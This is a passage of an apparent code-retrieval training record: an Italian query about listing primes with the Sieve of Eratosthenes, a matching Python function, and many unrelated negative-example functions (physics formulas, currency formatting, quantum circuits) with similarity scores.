musol.append(mnou)\n return musol", "def get_b(self):\n return ((self.s_pos / self.n_pos) + (self.s_neg / self.n_neg)) / 2", "def somme_encaissee(self) -> Numeric:\n return query_sum(\n self.offres().filter(paye=True),\n \"prix\",\n output_field=models.DecimalField(),\n )", "def BrittleCoulombMohr(sigmaA, sigmaB, Sut, Suc):\n if sigmaA > sigmaB and sigmaB > 0:\n n = Sut/sigmaA\n elif sigmaA > 0 and sigmaB < 0:\n n = 1/(sigmaA/Sut-sigmaB/Suc)\n elif sigmaA < 0 and sigmaA > sigmaB:\n n = -Suc/sigmaB\n return n", "def get_multiple_ab(a, b): # IN= 2'int' / OUT= 1'foat'\n return float(a*b)", "def hern_bulge_mass(r,b):\n rb = r/b\n return ((rb*rb)/(2*(1+rb)**2.))", "def valorEsperado(obs,ket):\n cal=Calculadora()\n obsSobreket=cal.accion(obs,ket)\n bra=cal.matrizConjugada(obsSobreket)\n ket1=cal.transpuesta([ket])\n bra1=cal.transpuesta(bra)\n car=cal.multiplicacionMatrizMatriz(bra1,ket1)[0][0]\n return car", "def test_atomic_masses():\n first = get_atomic_mass(\"As\")\n assert first == 74.9216\n \n second = get_atomic_mass(\"Be\")\n assert second == 9.012182\n\n third = get_atomic_mass(\"Li\")\n assert third == 6.941", "def getB(self):\n return ((self.bPlusbStar() / self.nPos) + (self.bMinusbStar / self.nNeg)) / 2", "def coefficient(self) -> float:\n ...", "def reprographie():\n nombreDePhotocopie = int(input(\"Entrez le nombre de photocopie a effectuer \"))\n PREMIER_PRIX = 0.10\n DEUXIEME_PRIX = 0.09\n TROISIEME_PRIX = 0.08\n PREMIERE_TRANCHE = 10\n DEUXIEME_TRANCHE = 20\n TROISIEME_TRANCHE = 30\n resultat = 0\n if(nombreDePhotocopie>TROISIEME_TRANCHE):\n resultat = DEUXIEME_TRANCHE*DEUXIEME_PRIX+1+(nombreDePhotocopie-30)*TROISIEME_PRIX\n elif(nombreDePhotocopie<=TROISIEME_TRANCHE):\n if(nombreDePhotocopie/10>1):\n resultat = (nombreDePhotocopie-10)*DEUXIEME_PRIX+(PREMIERE_TRANCHE*PREMIER_PRIX)\n else:\n resultat = nombreDePhotocopie*PREMIER_PRIX\n return resultat", "def f(a):\n b = a * 2\n while b.norm().asscalar() < 1000:\n b = b * 2\n if b.sum().asscalar() > 0:\n c = b\n else:\n c = 100 * b\n return c", "def __mul__(self, autre):\n\t\tif self.__valide and autre.__valide:\n\t\t\tp = polynome()\n\t\t\ta = self.liste_decroissante()\n\t\t\tb = autre.liste_decroissante()\n\t\t\tfor m in a:\n\t\t\t\tfor n in b:\n\t\t\t\t\tp.ajouter_monome(monome.produit(m, n))\n\t\t\treturn p\n\t\telse:\n\t\t\treturn polynome(False)", "def getFactor(currency):", "def Calc(self, a, b, size):\n self.eq = lambda x: (60000/((b-a)/size*x+a))\n points = []\n names = [str(self.offset)]\n points.append(0)\n for j in range(1, int(size)):\n points.append(integrate.quad(self.eq,0,j)[0])\n names.append(str(points[-1]+self.offset))\n self.beatstr = ' '.join(names)\n return points", "def _compute_linear_magnitude_term(index, M):\r\n if M <= c1:\r\n # this is the second term in eq. (2a), p. 20\r\n return a2 * (M - c1)\r\n else:\r\n # this is the second term in eq. (2b), p. 20\r\n return a7 * (M - c1)", "def _compute_linear_magnitude_term(index, M):\r\n if M <= c1:\r\n # this is the second term in eq. (2a), p. 20\r\n return a2 * (M - c1)\r\n else:\r\n # this is the second term in eq. (2b), p. 20\r\n return a7 * (M - c1)", "def expected_result(self, other):\r\n return float(1) / (1 + math.pow(10, float(other.elo - self.elo) / DIVIDER))", "def mult_mod(a, b, nbr, control):\n bina = [int(x) for x in bin(a)[2:]]\n # binb = [int(x) for x in bin(b)[2:]]\n binn = [int(x) for x in bin(nbr)[2:]]\n while len(binn) < len(bina):\n binn = [0]+binn\n # print(bina, binn)\n binn.reverse()\n bina.reverse()\n n = len(bina)+len(binn)*3+1\n na = len(bina)\n nan = len(bina)+len(binn) # debut de Y\n nany = len(bina)+2*len(binn)+1 # debut de \"A\" (ici c'est b)\n q = QuantumRegister(n+2+1, 'q') # +lost+lost2+control\n circ = QuantumCircuit(q)\n for i in range(na):\n if bina[i]:\n circ.x(q[i])\n for i in range(len(binn)):\n if binn[i]:\n circ.x(q[na+i])\n if control:\n circ.x(q[n+2])\n cmultmod(circ, q, # control, X, a, A, Y, n, N, binn, lost, lost2\n q[n+2],\n [q[i] for i in range(len(bina))],\n b,\n [q[i+nany] for i in range(len(binn))],\n [q[i+nan] for i in range(len(binn)+1)],\n nbr,\n [q[i+na] for i in range(len(binn))],\n binn,\n q[n],\n q[n+1])\n circ_m = measure(circ, q, [i for i in range(nan,nany)])\n return circ_m", "def cal_limit(prior_a, posterior_a,prior_b, posterior_b):\n limiter = 0\n a=0\n b=0\n for l in prior_a:\n limiter += math.pow((prior_a[l]-posterior_a[l]),2)\n a+=posterior_a[l]\n for l in prior_b:\n limiter += math.pow((prior_b[l]-posterior_b[l]),2)\n a+=posterior_b[l] \n # a=0 do not meet the condition, need to continue iteration\n if a==0:\n b=1\n print(\"Warning: line.py: sum posterior flow = 0\")\n else:\n b=math.sqrt(limiter)/a\n return b", "def calc(p=12, e=0.1):\n global base, total\n\n for i in range(1, p + 1):\n r = base * e\n print(\"Period: {}\".format(i))\n print(\" Return: {}\".format(r))\n base = base + r + putIn\n print(\" Base: {}\".format(base))\n total = total + 10000 + base\n print(\" Total: {}\".format(total))\n\n comp = pow(1 + e, p)\n print(\"Compound interest:{}\\nPeriod:{}\\nExpect return:{}\".format(comp, p, e))", "def num (self):\n return self.value[0]/self.value[1]", "def solution(self):\n return [(\"the\", 1561900)] * 100", "def __mul__(self,other):\n if(self.denominator*other.denominator<0):\n resultnumerator = -1*self.numerator*other.numerator\n resultdenominator = abs(self.denominator*other.denominator) \n else:\n resultnumerator = self.numerator*other.numerator\n resultdenominator = self.denominator*other.denominator \n newvalues = (resultnumerator,resultdenominator)\n return newvalues", "def SetMoneda(num, simbolo=\"$\", n_decimales=2):\n #con abs, nos aseguramos que los dec. sea un positivo.\n n_decimales = abs(n_decimales)\n\n #se redondea a los decimales idicados.\n num = round(num, n_decimales)\n\n #se divide el entero del decimal y obtenemos los string\n num, dec = str(num).split(\".\")\n\n #si el num tiene menos decimales que los que se quieren mostrar,\n #se completan los faltantes con ceros.\n dec += \"0\" * (n_decimales - len(dec))\n\n #se invierte el num, para facilitar la adicion de comas.\n num = num[::-1]\n\n #se crea una lista con las cifras de miles como elementos.\n l = [num[pos:pos+3][::-1] for pos in range(0,50,3) if (num[pos:pos+3])]\n l.reverse()\n\n #se pasa la lista a string, uniendo sus elementos con comas.\n num = str.join(\",\", l)\n\n #si el numero es negativo, se quita una coma sobrante.\n try:\n if num[0:2] == \"-,\":\n num = \"-%s\" % num[2:]\n except IndexError:\n pass\n\n #si no se especifican decimales, se retorna un numero entero.\n if not n_decimales:\n return \"%s %s\" % (simbolo, num)\n\n return \"%s %s.%s\" % (simbolo, num, dec)", "def ilerp(a, b, t):\n return (t - a) / (b - a)", "def amount_4_conto_energia(self, production, verbose=False):\n en_autocons = round( production * self.perc_autocons) \n energia_immessa_in_rete = production - en_autocons\n tot_incentivo_all_prod = production * self.incentivo_all_prod\n if en_autocons < self.used_external_en:\n tot_incentivo_ssp = self.incentivo_ssp * energia_immessa_in_rete\n else:\n tot_incentivo_ssp = self.incentivo_ssp * energia_immessa_in_rete + \\\n self.eccedenze * (en_autocons - self.used_external_en )\n if verbose:\n print(\"\\nincentivo_ssp: \",self.incentivo_ssp)\n print(\"incentivo_all_prod: \",self.incentivo_all_prod)\n print(\"en_autocons \", en_autocons) \n print(\"energia_immessa_in_rete \", energia_immessa_in_rete)\n print(\"tot_incentivo_all_prod \", tot_incentivo_all_prod) \n print(\"tot_incentivo_ssp \", tot_incentivo_ssp)\n \n \n return tot_incentivo_all_prod + tot_incentivo_ssp - self.spese_4", "def problem():\n\n print 'problem #27'\n\n l = 0\n m_a = 0\n m_b = 0\n for a in xrange(-1000, 1000):\n for b in xrange(-1000, 1000):\n p = len(check(a, b))\n if p > l:\n l = p\n m_a = a\n m_b = b\n\n print 'the product of coefficients is %s' % (m_a * m_b)", "def estimacion02():\n n = 1000 # Simulaciones\n X = math.e * poisson(1)\n M = X # Media Muestral (valor inicial: M(1) = X1)\n S_cuadrado = 0 # Varianza Muestral (valor inicial: S_cuadrado(1) = 0)\n # Calculamos M(n) y S_cuadrado(n)\n for j in xrange(2, n+1):\n X = math.e * poisson(1)\n A = M\n M += (X - M)/float(j)\n S_cuadrado = (1 - 1.0/(j-1))*S_cuadrado + j*((M-A)**2)\n\n S = math.sqrt(S_cuadrado) # Desviacion Estandar Muestral (sigma)\n\n IC = (M - 1.96*(S/math.sqrt(n)) , M + 1.96*(S/math.sqrt(n)))\n\n return M, S_cuadrado, IC", "def cost(self,e1,e2):\n pass", "def MAE_rel(self):\n try:\n return(self.MAE / self.price_open)\n except:\n return", "def quo(self, a, b):\n return a / b", "def calceNumerator ( term , numeratorN1 , numeratorN2 ) :\n if term == limit :\n if term % 3 == 0 :\n return ( 2 * int ( term / 3 ) * numeratorN1 ) + numeratorN2\n return numeratorN1 + numeratorN2\n\n multiplier = 1\n if term % 3 == 0 :\n multiplier = 2 * int ( term / 3 )\n numerator = multiplier * numeratorN1 + numeratorN2\n\n return calceNumerator ( term + 1 , numerator , numeratorN1 )", "def fuel_calc(mass):\n return max((mass / 3) - 2, 0)", "def __bsa(self, a, b):\n try:\n if a + 1 == b:\n if a == 0:\n p_ab = q_ab = mpz(1)\n else:\n p_ab = mpz((6 * a -5) * (2 * a - 1) * (6 * a - 1))\n q_ab = mpz(a * a * a * self.C3_24)\n t_ab = p_ab * (self.A + self.B * a)\n if a & 1:\n t_ab *= -1\n else:\n m = (a + b) // 2\n p_am, q_am, t_am = self.__bsa(a, m)\n p_mb, q_mb, t_mb = self.__bsa(m, b)\n p_ab = p_am * p_mb\n q_ab = q_am * q_mb\n t_ab = q_mb * t_am + p_am * t_mb\n return [p_ab, q_ab, t_ab]\n except Exception as e:\n raise", "def abbott_steam():\n per_klb = 20 # dollars per klb of steam\n kwh_eq = to_kwh(1) # kwh equivalent of steam\n per_kwh = per_klb / kwh_eq\n return per_kwh", "def graphite_entropic_change_PeymanMPM(sto, c_s_max):\n\n du_dT = 10 ** (-3) * (\n 0.28\n - 1.56 * sto\n - 8.92 * sto ** (2)\n + 57.21 * sto ** (3)\n - 110.7 * sto ** (4)\n + 90.71 * sto ** (5)\n - 27.14 * sto ** (6)\n )\n\n return du_dT", "def somme(self) -> Numeric:\n return query_sum(\n self.offre_set.filter(valide=True),\n \"prix\",\n output_field=models.DecimalField(),\n )", "def FO2(lam):\n return 1.096 + 1.385 *1e-3 *lam**(-2) + 1.448 *1e-4 *lam**(-4)", "def n_wyraz(a1,nr_wyrazu,r):\n return a1+(nr_wyrazu-1)*r", "def item_tres(n):\n if n <= 0.167:\n return 0\n elif n > 0.167 and n <= 0.333:\n return 1\n elif n > 0.333 and n <= 0.500:\n return 2\n elif n > 0.500 and n <= 0.667:\n return 3\n elif n > 0.667 and n <= 0.834:\n return 4\n elif n > 0.834 and n <= 1.000:\n return 5", "def molar_mass_dry_air():\n return 28.9647", "def mw (mva, pf):\r\n x= mva*1000000\r\n y=x*pf/1000000\r\n return y", "def _momentum_unit(eq):\n mp=1.66e-27; A=2;\n q=1.602e-19; Z=1\n B = np.abs(eq.B0EXP)\n R = eq.R0EXP\n\n mom_unit= Z*q*B*R**2 #pphi=pphi[SI]*pphi_unit\n energy_unit = mp*A/(Z*Z*q*q*R**2*B**2) #E=E[J]*energy_unit\n mu_unit = mp*A/(Z*Z*q*q*R**2*B) #mu=mu[SI]*mu_unit\n return mom_unit, energy_unit, mu_unit", "def algo_Euclide_etendu(a,b):\n r1=a\n u1=1\n v1=0\n r2=b\n u2=0\n v2=1\n while r2!=0 : #Invariants de boucle : r1=u1*a+v1*b et r2=u2*a+v2*b\n q=r1//r2\n rs=r1 ; us=u1 ; vs=v1 #Variables de sauvegarde\n r1=r2 ; u1=u2 ; v1=v2\n r2 = rs - q*r2 # r2 <- Reste de la division euclidienne de r1 par r2\n u2 = us - q*u2\n v2 = vs - q*v2\n return(r1,u1,v1) #On prend le dernier reste non nul.", "def succ(self, a):\n#das self.control Dictionary wird unter \"analyse\" aufgebaut; wird hier eingelesen\n n, absucc = self.control[a.name]\n if n == 0: return 0.0\n else: return float(absucc) / float(n)", "def alturamax(gravedad, veli):\r\n #se realiza varias operacione para encontrar la altura maxima \r\n maxima=(veli/2)*(veli/gravedad)\r\n #se regresa el valor de maxima\r\n return maxima", "def calc_mad(a,b):\n comb = a + b\n idx = np.array(range(len(a)))[~np.isnan(comb)]\n a1=a[idx]\n b1=b[idx]\n N = len(a1)\n mad = np.sum(np.abs(a1-b1))/N\n return mad", "def __cacula_agio(table):\n from m2py.misc.vectorize import column\n\n PV = table[0][-1]\n total = sum(column(table, 1))\n premium = total/PV - 1\n return round(premium, 2)" ]
[ "0.64670295", "0.63709563", "0.6305553", "0.6273303", "0.62383693", "0.62260216", "0.6183728", "0.61380094", "0.61126524", "0.61095035", "0.6071675", "0.6056668", "0.60076785", "0.5992859", "0.5985773", "0.5965909", "0.5937595", "0.5930666", "0.5926027", "0.59098005", "0.59063566", "0.5883996", "0.58507204", "0.584081", "0.584081", "0.58372307", "0.5820651", "0.5813368", "0.5810271", "0.578832", "0.57832706", "0.57637686", "0.57511914", "0.57484865", "0.57457757", "0.5731912", "0.57315487", "0.572053", "0.57197875", "0.5703543", "0.5693956", "0.5691738", "0.56886035", "0.56850535", "0.56779397", "0.56713384", "0.566788", "0.5665312", "0.56651646", "0.5664775", "0.5656234", "0.56475693", "0.56435496", "0.5643407", "0.56168664", "0.56101155", "0.5607972", "0.5602767", "0.55906695", "0.55880857", "0.55695605", "0.55676717", "0.55656797", "0.55639213", "0.55589145", "0.5543361", "0.55430233", "0.5533229", "0.5533229", "0.55300736", "0.55287796", "0.55241096", "0.552266", "0.5522197", "0.5516766", "0.55144703", "0.55141413", "0.5505582", "0.5500749", "0.549922", "0.5492686", "0.54834735", "0.5482", "0.5480569", "0.54786336", "0.5477743", "0.5477298", "0.54734373", "0.54728276", "0.54708034", "0.54660445", "0.54638565", "0.5461722", "0.5446306", "0.544545", "0.5444949", "0.54341125", "0.5429386", "0.542864", "0.54239714", "0.5422654" ]
0.0
-1
Restituisce una lista con tutti i numeri primi fino a n compreso col metodo del crivello di Eratostene
def primi(n): numVec = [] for x in range(n-1): numVec.append(x+2) for num in numVec[:(n//2-1)]: if numVec[num-2] != 0: numVec[slice(2*num-2, n-1, num)] = [0]*(n//num-1) numVec = [x for x in numVec if x!=0] return numVec
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mk_lst_atnum(self):\n\t\telem_rnge=[]\n\t\tfor i in self.atom_num_lst:\n\t\t\tel_strt=i[0]\n\t\t\tel_end=i[1]\n\t\t\trnge_sect=range(el_strt,el_end+1)\n\t\t\telem_rnge.extend(rnge_sect)\n\t\telements=[]\n\t\tfor i in elem_rnge:\n\t\t\telement=Element.from_Z(i)\t# Indice -> pymatgen element object\n\t\t\telements.append(element)\n\t\treturn elements\n\t\tprint elements", "def listes(Mi, Ma, N):\n if N == 0:\n yield []\n elif Ma - Mi < N:\n yield None\n else:\n # Avec Mi + 1\n for reste in listes(Mi + 1, Ma, N - 1):\n if reste != None:\n yield [Mi + 1] + reste\n \n # Sans Mi + 1\n for reste in listes(Mi + 1, Ma, N):\n if reste != None:\n yield reste", "def pgcd_numerateurs(self):\n\t\tl = []\n\t\tif self.__valide:\n\t\t\tfor m in self.liste_decroissante():\n\t\t\t\te = abs(m.get_coefficient().get_num().valeur())\n\t\t\t\tif not (e in l):\n\t\t\t\t\tl.append(e)\n\t\treturn pgcd_liste(l)", "def grAList() -> list:\n return [2, 5, 6, 9, 10, 11, 13, 17, 18, 30]", "def mots_Nlettre(L:list, n)->list:\n lst= []\n mot = 0\n for i in range(len(L)):\n mot = L[i] \n cpt = 0\n for e in mot:\n cpt += 1\n if cpt == n:\n lst.append(mot)\n return lst", "def numerize():\n pass", "def __numero_terme_sup(synthese, lg):\n tb_synthese = []\n for i in synthese:\n synth = []\n nu = 1\n pteur = 1\n for j in range(lg):\n if i & pteur:\n synth.append(nu)\n nu += 1\n pteur <<= 1\n tb_synthese.append(synth)\n return tb_synthese", "def subtraction_of(number_list):", "def compose_listofr(atom_name, listofn):\n c = 1.06\n c2 = 1.4\n listofr = []\n for x in range(len(listofn)):\n if (atom_name[0] == \"N\"):\n if (listofn[x].atom_name[0] == \"H\"):\n listofr.append(1.010*c)\n if (listofn[x].atom_name[0] == \"O\"):\n listofr.append(1.060*c)\n if (listofn[x].atom_name[0] == \"C\"):\n listofr.append(1.475*c)\n if (listofn[x].atom_name[0] == \"N\"):\n listofr.append(1.450*c)\n if (atom_name[0] == \"O\"):\n if (listofn[x].atom_name[0] == \"H\"):\n listofr.append(0.970*c)\n if (listofn[x].atom_name[0] == \"O\"):\n listofr.append(1.490*c)\n if (listofn[x].atom_name[0] == \"C\"):\n listofr.append(1.160*c)\n if (listofn[x].atom_name[0] == \"N\"):\n listofr.append(1.060*c)\n if (atom_name[0] == \"C\"):\n if (listofn[x].atom_name[0] == \"H\"):\n listofr.append(1.090*c)\n if (listofn[x].atom_name[0] == \"O\"):\n listofr.append(1.160*c)\n if (listofn[x].atom_name[0] == \"C\"):\n listofr.append(1.540*c)\n if (listofn[x].atom_name[0] == \"N\"):\n listofr.append(1.475*c)\n if (atom_name[0] == \"H\"):\n if (listofn[x].atom_name[0] == \"H\"):\n listofr.append(0.740*c2)\n if (listofn[x].atom_name[0] == \"O\"):\n listofr.append(0.970*c2)\n if (listofn[x].atom_name[0] == \"C\"):\n listofr.append(1.090*c2)\n if (listofn[x].atom_name[0] == \"N\"):\n listofr.append(1.010*c2)\n return listofr", "def maiores(lista, n):\n numeros = [lista for lista in lista if lista > n]\n return numeros", "def retornaDigitos(numero):\r\n\tlista = []\r\n\twhile numero>=10:\r\n\t\tx = numero%10;\r\n\t\tnumero = numero/10;\r\n\t\tlista.append(x)\r\n\tlista.append(numero)\r\n\tlista.reverse()\r\n\treturn lista", "def double_nums(num_list):", "def arredondar(self):\n for y in range(self.altura):\n for x in range(self.largura):\n for i in range(3):\n self.lista[x][y][i] = int(self.lista[x][y][i])", "def list_to_nine(n):\n if n < 10:\n print(n)\n else: \n print(n, end=\", \")\n n = abs(n - mirror(n))\n list_to_nine(n)", "def divisior(n: int) -> list:\n j = [n]\n for d in range(n+1): #loop bis n\n d > 0", "def raizCuadrada(listaNumeros):\n\n\treturn [math.sqrt(n) for n in listaNumeros]", "def carac_reproducciones(caracteristica, valor_min, valor_max, catalog):\n artistasNoRepetidos = lt.newList('ARRAY_LIST')\n artistasRepetidos = lt.newList('ARRAY_LIST')\n MapCaracteristicas = mp.get(catalog['caraContenido'], caracteristica)\n RBTcaracteristica = me.getValue(MapCaracteristicas)\n lista_listas_musica = om.values(RBTcaracteristica, valor_min, valor_max)\n lista_lista_musica = it.newIterator(lista_listas_musica)\n while it.hasNext(lista_lista_musica): \n lista_musica = it.next(lista_lista_musica)#lista_musica es un dicc de listas que tengo que recorrer \n musicas = it.newIterator(lista_musica)\n while it.hasNext(musicas):\n musica = it.next(musicas) #iterar sobre esta lista por artist_id\n if int(lt.isPresent(artistasNoRepetidos, (musica['artist_id']))) == 0:\n lt.addLast(artistasNoRepetidos, musica['artist_id'])\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n else:\n if int(lt.isPresent(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))) == 0:\n lt.addLast(artistasRepetidos, (musica['created_at'] + musica['user_id'] + musica['track_id']))\n return lt.size(artistasRepetidos), lt.size(artistasNoRepetidos)", "def _split_into_legal_volume(\n self, oclc_numbers: List[str] = [], n: int = 50\n ) -> List[str]:\n\n for i in range(0, len(oclc_numbers), n):\n yield \",\".join(oclc_numbers[i : i + n])", "def raizCuadrada(listNum):\n\n return [math.sqrt(n) for n in listNum]", "def loto() -> List[int]:\n numeros = []\n nbre_valeurs = 6\n val_min = 1\n val_max = 49\n\n nbre_elements = 0\n while nbre_elements <= nbre_valeurs:\n numero = random.randint(val_min, val_max)\n if numero not in numeros:\n numeros.append(numero)\n nbre_elements += 1\n\n return numeros", "def get_list(self):\r\n return self.numbers", "def pretraga_po_nazivu(self, lst,rijec):\n pretrazeno = []\n for i in lst:\n if i.naziv.lower().find(rijec.lower()) != -1:\n pretrazeno.append(i)\n return pretrazeno", "def fn(n):\n if not n: return []\n elif n < 20: return [mp[n]]\n elif n < 100: return [mp[n//10*10]] + fn(n%10)\n else: return [mp[n//100], \"Hundred\"] + fn(n%100)", "def inutiliza_por_lote(self, notas, serie, justificativa): #ok\r\n # notas eh uma lista\r\n notas = notas # notas\r\n serie = str(serie) # serie\r\n if not justificativa:\r\n justificativa = \"Numeracao nao utilizada!\" \r\n\r\n for i in notas:\r\n nnf = str(i)\r\n #serie = \"0\"\r\n self.inutiliza_por_nota(nnf, serie, justificativa)", "def diviseLignes(prog):\n\t\n\tliste = []\n\tligne = \"\"\n\ti=0\n\twhile i < len(prog):\n\t\tif prog[i] == '\\n': #Si on rencontre un saut de ligne.\n\t\t\t#if ligne != \"\": # Et si cette ligne precedant le saut de lignes n'etait pas vide, on l'ajoute.\n\t\t\tliste += [ligne]\n\t\t\tligne = \"\"\n\t\telse: #Si on atteit pas un saut de ligne, on continue a lire\n\t\t\tligne += prog[i]\n\t\ti+=1\n\tif ligne != \"\":\n\t\tliste += [ligne]\n\treturn liste", "def pgm_vers_matrice_simple(fichier):\n\n # Fichier à lire\n fic_in = open(fichier,\"r\")\n\n i = 0 # Numéro de ligne du fichier\n matrice = []\n for ligne in fic_in:\n if i >= 3:\n liste_str = ligne.split()\n liste = [int(x) for x in liste_str]\n matrice += [liste]\n i = i + 1\n\n # Fermeture des fichiers\n fic_in.close()\n return matrice", "def liste_N_nb_premier(N):\n liste = []\n i = 0\n while len(liste) < N:\n if is_prime(i):\n liste.append(i)\n i += 1\n return liste", "def find_all_lists(rij):\n\n langste_rij = [0]*len(rij)\n langste_rij[0] = 1\n\n for i in range(len(rij)):\n for j in range(i):\n #print \"*******\", i, rij[i], j, langste_rij[i]\n if ((rij[j] < rij[i]) and (langste_rij[i] < langste_rij[j]+1)):\n langste_rij[i] = langste_rij[j] + 1\n\n return langste_rij", "def lessthan_5(num_list):", "def abscissae(self) -> List[float]:", "def calcular_traspuesta(self):\n # supongo que el nodo de mayor indice en je es el maximo nodo que hay\n n1 = np.max(self.je) + 1 # el +1 es por la base-0 de python\n # ahora para cada elem1, recorro los elem0 para ver las conexiones\n # notar que supondre que los elems0 son range(self.num) y los elems1 son range(n1)\n jeT = []\n len_jeT = 0\n neT = np.zeros(n1, dtype=int)\n for i1 in range(n1): # aca supongo que los elems1 son range(n1), o sea una lista de indices\n for i0 in range(self.num): # idem para elems0, son una lista de indices\n elem0 = self.get_con_elem0(i0)\n if i1 in elem0:\n jeT.append(i0)\n len_jeT += 1\n neT[i1] += 1\n # convierto el jeT a numpy\n jeT = np.array(jeT, dtype=int)\n # ensamblo el ieT\n ieT = np.zeros(n1+1, dtype=int)\n ieT[n1] = len_jeT # empiezo con el indice de un elemento extra que no existe\n for i1 in range(n1-1, -1, -1):\n ieT[i1] = ieT[i1+1] - neT[i1] # de ahi calculo el indice donde empieza cada elemento\n return n1, len_jeT, neT, ieT, jeT", "def dataPrep(mydata: list) -> list:\n mylist = [int(elm) for elm in mydata]\n\n volt = int(max(mylist)) + 3\n start = 0\n\n mylist.extend([volt, start])\n mylist.sort()\n\n return mylist", "def figurate_list(s):\n f = polygon_gen(s)\n ans = []\n c = next(f)\n while c < 999: c = next(f)\n while c < 10000:\n c = str(c)\n if c[2] != '0': ans.append(FigurateNode(c[:2], c[-2:], s))\n c = next(f)\n return ans", "def listarNum(num):\r\n num=str(num)\r\n list_num=np.array([])\r\n for n in num:\r\n n=float(n)\r\n list_num=np.append(list_num, n)\r\n return list_num", "def get_puzzel(size, puz) :\n if (len(puz)!= size) :\n print(\"Error : Size given and the size of the puzzle doesn't concorde\\nThe puzzle is not well formatted.. ciao\")\n exit()\n else :\n lst_ret = []\n for i in puz:\n line = list(filter(None, re.split(r'\\n| ', i)))\n if (len (line) == size) :\n for j in line :\n temp_val = check_int(j)\n if (temp_val < size ** 2):\n if (temp_val not in lst_ret) :\n lst_ret.append(temp_val)\n else :\n print(\"Error : Duplicate element in the puzzle [{}]\".format(temp_val))\n exit()\n else :\n print(\"Error : Element in the puzzle is too large [{}] size^2 [{}]\".format(temp_val, size**2))\n exit()\n else :\n print(\"Error: Puzzle not well formatted [{}] should be {} elements, ciao \".format(line, size))\n exit()\n return (lst_ret)", "def numListar(lista):\r\n num_list=str()\r\n for num in lista:\r\n num = int(num)\r\n num_list=num_list+str(num)\r\n return num_list", "def lis(n1,n2):\n\ti = 0\n\tif n1 and n2 <= 20:\n\t\tfor x in range(n1,n2+1):\n\t\t\tlis1.append(x*x)\n\t\tlis1.reverse()\n\t\t\n\t\tfor y in lis1:\n\t\t\tif i <=4:\n\t\t\t\tlis1.pop()\n\t\t\t\ti +=1\n\t\tprint(lis1)\n\telse:\n\t\tprint(\"Value out of range\")", "def number_list(l):\n return ['{i:>{s}}. {v}'.format(s=len(str(len(l))), i=i+1, v=l[i]) for i in range(len(l))]", "def evaluate_files_list(numbers):\n expanded = []\n for number in numbers.split(\",\"):\n if \"-\" in number:\n start, end = number.split(\"-\")\n nrs = range(int(start), int(end) + 1)\n expanded.extend(nrs)\n else:\n expanded.append(int(number))\n return expanded", "def mostrEmpl2(finalData): #Esta sección fue hecha por Ángel\n listaUE = []\n for elemento in finalData:\n nombre = elemento[0]\n listaUE.append(nombre) \n return listaUE", "def ex_xerox(data):\n n = 1\n try:\n n = int(data[0])\n except ValueError:\n pass\n data = data[1:]\n rv = []\n for _ in range(n):\n rv += data\n return rv", "def __init__(self):\n self.numeralList = self.nf.getOcrNumerals(1234567890, 10)", "def _pega_no(self, index):\n ponteiro = self.inicio\n for i in range(index):\n if ponteiro:\n ponteiro = ponteiro.prox\n else:\n raise IndexError(\"list index out of range\")\n return ponteiro", "def gatherDivisors(number): # prvni string ve funkci je comment; \"\"\" znamenam ze je na vic radek\n\tdivisors = []\n\tfor div in range(1, number + 1): # range vyhodi vse od jedne az do number\n\t\tif number % div == 0:\n\t\t\tdivisors.append(div)\n\treturn divisors", "def fn(n):\n if n == 0: return [\"\"]\n if n == 1: return [\"0\", \"1\", \"8\"]\n return [x+y+xx for x, xx in mp for y in fn(n-2)]", "def reemplaza_tildes(palabra):", "def truncatable_primes():\n list_tp = []\n i = 8\n while len(list_tp) < 11:\n if is_truncatable(i):\n list_tp.append(i)\n i += 1\n if i % 100 == 0:\n print(\"i : \", i)\n return list_tp, sum(list_tp)", "def get_list_of_int2(self):\n pass", "def powiekszoneParzysteZZerami(L): #[!] drobny błąd\n wynik = []\n for n in L:\n if parzysta(n)==True:\n wynik.append(n+1) # Jesli wolisz: wynik += [n+1]\n else:\n wynik.append(n)\n wynik.append(0) # Znowu, mozna: wynik += [0]\n return wynik", "def genera_vacios(lista_anidada):\n lista_vacios = [ ]\n letras = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"]\n\n for n, x in enumerate(lista_anidada):\n for i, y in enumerate(x):\n if y == \"0\":\n fila = letras[n]\n lugar = str(i+1)\n estacionamiento = fila,lugar\n lista_vacios.append(\"\".join(estacionamiento))\n return lista_vacios", "def primos_permitidos():\r\n parejas_permitidas = [(31,23),(47,19),(7,19),(17,41),(31,7),(29,47),(37,23),(2,79),(43,17),(7,37),(5,61),\r\n (17,31),(23,19),(23,7),(11,83),(17,7),(71,3),(37,29),(7,79),(11,59),(37,3),(3,59),(13,53),(79,11),(89,3),\r\n (2,97),(23,5),(13,41),(89,2),(5,97),(89,7),(41,7),(59,7),(19,41),(31,13),(29,19),(79,5),(83,7),\r\n (83,3),(43,7),(23,17),(23,29),(3,41),(17,47),(37,13),(37,11),(53,5),(43,3),(5,83),(7,67),(89,5),\r\n (19,53),(29,17),(53,11),(11,41),(5,47),(73,13),(13,23),(47,29),(5,89),(17,23),(5,43),(71,11),(67,5),\r\n (149,3),(7,47),(19,37),(127,7),(109,7),(7,53),(67,2),(19,41),(67,11),(7,97),(3,103),(3,131),(163,2),(11,61),\r\n (113,5),(73,5),(17,7),(61,5),(97,5),(43,13),(157,5),(2,107),(71,5),(3,151),(5,29),(2,151),(137,3),\r\n (13,29),(59,11),(137,5),(47,11),(13,47),(2,197),(53,17),(239,3),(229,2),(23,37),(53,13),(11,73)]\r\n return parejas_permitidas", "def obtener_preguntas_juego(num_preguntas=0, categ=\"none\", subcateg=\"none\", nivel=0):\r\n\r\n if not (is_categoria(categ)):\r\n categ = \"none\"\r\n\r\n preguntas_juego = [] # Lista preguntas juego\r\n\r\n if num_preguntas != 0:\r\n if categ == \"CM\":\r\n preguntas_archivo = arch.leer_archivo(\"Ciencias.txt\")\r\n renglones_preguntas = obtener_renglones(preguntas_archivo, subcateg, nivel)\r\n lista_aux = []\r\n while num_preguntas != 0:\r\n num_random = num_rand(0, len(preguntas_archivo))\r\n if num_random in renglones_preguntas:\r\n lista_aux = []\r\n lista_aux.append(arch.obtener_dato(preguntas_archivo, num_random, 3))\r\n 